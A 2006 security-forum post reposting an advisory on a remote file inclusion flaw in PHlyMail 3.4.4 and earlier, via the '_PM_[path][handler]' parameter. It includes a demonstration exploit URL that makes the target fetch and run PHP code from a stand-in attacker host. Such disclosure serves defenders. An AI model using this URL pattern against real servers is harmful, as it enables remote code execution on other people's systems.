English | Vietnamese
 

banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register   [Login] Loginhttp  | https  ]
 
Forum Index Thông tin new bugs và exploits PHlyMail Include File Bug in '_PM_['path']['handler']'  XML
  [Question]   PHlyMail Include File Bug in '_PM_['path']['handler']' 22/08/2006 23:56:31 (+0700) | #1 | 16990
[Avatar]
 LeonHart
HVA Friend
Joined: 10/01/2003 11:11:52
Messages: 215
Location: Secret
Offline
[Profile] [PM]
PHlyMail Include File Bug in '_PM_['path']['handler']' Parameter Lets Remote Users Execute Arbitrary

Version(s): 3.4.4 and prior versions
Description: A vulnerability was reported in PHlyMail. A remote user can include and execute arbitrary code on the target system.

The 'handlers/email/mod.listmail.php' script does not properly validate user-supplied input in the '_PM_['path']['handler']' parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

A demonstration exploit URL is provided:

+http://[target]/[phlymail_path]/handlers/email/mod.listmail.php?_PM_[path][handler]=[http://www.myevilsite.com/evil_scripts.txt]

Kacper (a.k.a Rahim) discovered this vulnerability.
Impact: A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|